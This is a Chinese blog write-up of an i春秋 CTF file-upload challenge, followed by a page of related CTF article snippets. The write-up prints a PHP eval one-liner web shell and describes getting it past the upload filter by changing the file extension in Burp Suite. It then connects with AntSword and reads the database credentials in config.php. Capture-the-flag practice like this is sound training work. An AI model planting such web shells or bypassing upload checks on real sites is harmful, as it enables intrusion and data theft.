i春秋CTF训练 Web Do you know upload?

最新推荐文章于 2024-05-06 20:16:41 发布
最新推荐文章于 2024-05-06 20:16:41 发布
阅读量618 收藏 1
点赞数 1
分类专栏: CTF 文章标签: php 数据库
来自 椰奶冻不安全 的博客,复制完可要记得我吖
本文链接:https://blog.csdn.net/qq_40654505/article/details/107084980
版权

Web Do you know upload?

题目内容:加油吧,少年。

题目链接请在i春秋申请

在这里插入图片描述

一个简单的文件上传,写个一句话命名为2.jpg,用burpsuit抓包后改为2.php上传成功

<?php @eval($_POST[cmd]);?>

在这里插入图片描述

返回了上传路径,用蚁剑连接此路径,密码为cmd,可成功连接

在这里插入图片描述
查看config.php发现数据库配置信息

<?php
error_reporting(0);
session_start();
$servername = "localhost";
$username = "ctf";
$password = "ctfctfctf";
$database = "ctf";

// 创建连接
$conn = mysql_connect($servername,$username,$password) or die(" connect to mysql error");
mysql_select_db($database);
?>

蚁剑连接数据库,设置用户名ctf,密码为ctfctfctf

在这里插入图片描述
点击ctf库flag表flag字段,点击执行得到flag
在这里插入图片描述

椰奶冻不安全
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
个人CTF入门训练过程WriteUp
LastButNotLeast的博客
11-18 1847
(view-source:http://www.monyer.com/game/game1/) 查看网页源代码 → <a href="first.php"></a> ← php
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台
2020第五空间 web writeup
a3320315的博客
06-27 3329
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
2024年网络安全最全CTF 全讲解:[SWPUCTF 2024 新生赛]Do_you_know_http(2),2024年最新借花献佛
最新发布
2401_84267735的博客
05-06 537
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。因此,在安全性要求较高的情况下,应该使用其他方式来验证客户端的身份。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。
[RootersCTF2019]I_<3_Flask 1&arjun爆破参数
plant1234的博客
10-04 1578
根据测试发现有ssti模板注入。
题目2-5-Careful
博客地址 www.sec0nd.top
07-26 663
考查点:HTTP的Response字段 打开后显示 Do you know what happend just now?! 刚刚发生了什么? 显然,在刚刚打开网页链接时,浏览器和服务器之间产生了一系列不可告人的秘密,我们需要监听他们之间的数据交互过程 这里采用BurpSuite 抓包后发送到repeater模块 来到repeater模块,查看返回的数据 因为操作环境在本地,未能正确返回数据,理论上应该能返回右边的数据,即可得到flag ...
wdb_2018_2nd_easyfmt详解
像初雪一样自由洒落
04-25 1591
wdb_2018_2nd_easyfmt详解 自己做出来了,,,,还看其他人的 参考:wdb_2018_2nd_easyfmt 程序流程 程序流程非常简单,可以一直进行格式化字符串漏洞。 漏洞利用 首先通过格式化字符串泄露栈信息 通过格式化字符串修改printf_got表为system(one_gadget本地打通了,远程没有,,) 发送“/bin/sh\x00”, 详细过程 0.查看基本信息 32位程序,只开了nx winter@ubuntu:~/buu$ file wdb_2018_2nd_e.
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP的反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
CTF工具之御剑后台扫描(web).rar
09-16
CTF工具之御剑后台扫描(Web)】 在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,参赛者通过解决各种安全问题来获取分数。御剑后台扫描工具是专门为CTF比赛设计的一款Web渗透测试工具,主要用于...
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
CTF日记之 “百度杯”CTF比赛 十月场
sunleibaba的博客
01-28 459
CTF日记:“百度杯”CTF比赛 十月场 Vld 点开之后发现: 还是先查看源代码: 访问: index.php.txt 发现了一堆这个东西,然后根据之前的界面上写的do you know Vulcan Logic Dumper?,百度一下“Vulcan Logic Dumper”: 这肯定就是所谓的Vulcan Logic Dumper了,先了解下相关概念 PHP内核-Zend引擎:http://www.php.cn/php-weizijiaocheng-355597.html PHP中的opc
[BMZCTF20220101 crypto] do_you_know_it
weixin_52640415的博客
01-01 322
这个没作出来,看好多人都作出来了,结束后问了问。这是LaTeX写公式的首字母。 有在线的编辑工具在线LaTeX公式编辑器-编辑器 可以上传自动识别,但认的不好。手工练习了一下 flag\{\Pi \limit \aleph y_{-} \wp \infty \therefore \heartsuit _{-} \longleftarrow \aleph \Theta \eth \Xi \} 每个后边第一个字母(注意大小写) flag{Play_with_LaTex} 这个心和L没有,应该就..
preg_match函数,正则匹配绕过
热门推荐
SsMing的博客
12-27 1万+
以ichunqiu欢乐赛为例子 1.通过.swp 文件恢复出php脚本 vi index.php.swp recover 2.第一关源码为 &lt;?php function areyouok($greeting){    return preg_match('/Merry.*Christmas/is',$greeting); } $greeting=@$_POST['greetin...
i春秋 Do you know upload
g1ut_t0ny的博客
07-03 281
Do you know upload 思路 打开题目,既然是图片上传,大概思路应该是抓包拦截改后缀上传一句话,菜刀连上找flag完事(简单的话)。 步骤 1、先上传图片,然后使用burpsuite拦截,更改后缀为php 2、显示上传成功,在浏览器访问一下/upload/2.php确认上传成功 3、使用菜刀连接 4、查找flag信息,发现并没有,但有一个config.php,看看里面有点啥 5、有了账户密码,那考虑添加配置信息,连接到数据库看看flag藏在里面没 T 数据库类型 H 服务器名 u 用户名
BugkuCTF-PWN题pwn7-repeater详细讲解多解法
am_03的博客
08-31 4023
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
ctf (Do_you_know_http)
Glacier_Mount的博客
06-27 2310
burp suite的简单应用
CTF-Web-Do you know upload
Fisher的安全日记
11-14 772
0×00 背景迫于挖洞挖不dao,练练CTF,复习复习。 题目地址 https://www.ichunqiu.com/battalion?t=1&r=61025 0×01 审题 文件上传 0×02 文件上传 上传一个图片,成功。然后传php文件,提示文件类型错误,bp抓包,将上传类型改成image/jpeg,上传成功 0×03 菜刀连接 [外链图片转存失败,源站可能有防盗链机制,建议...
CTF-"第三届“百越杯”福建省高校网络空间安全大赛":Do you know upload
路漫漫其修远
08-03 189
分值:100分 类型:Web题目名称:Do you know upload? 题目内容:https://www.ichunqiu.com/battalion?t=1&r=0 知识点 使用BurpSuite绕过上传文件格式校验 使用中国菜刀连接一句话???? 操作流程 打开页面,是个上传界面.直接上传php一句话,提示文件类型不允许. 上传一句话.jpg,提交时使用Burpsuite...
CG-CTF WEB 解题记录 11-15
aap49042的博客
08-14 678
写了一部分的web题,算是把它最基础的一部分做了一遍,以后的几天将持续更新CG-CTF WEB部分的题解,为了不影响阅读,所以每五道题的题解以一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ Download~! 这个题题库出现了问题,暂时不能访问,随后更新 COOKIE 打开题目,看到一条提示,0=not,随后我们打开网页 提示我们pleas...
这是一道ctf比赛web方向的题目 <?php highlight_file(__FILE__); eval($_POST[1]);
05-13
这样的代码容易被黑客利用来攻击服务器或者窃取用户的敏感信息。如果您不确定您的代码是否安全,强烈建议不要在生产环境中使用。 ... 为了保障网站的安全,应该避免在生产环境中使用 `eval` 函数。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值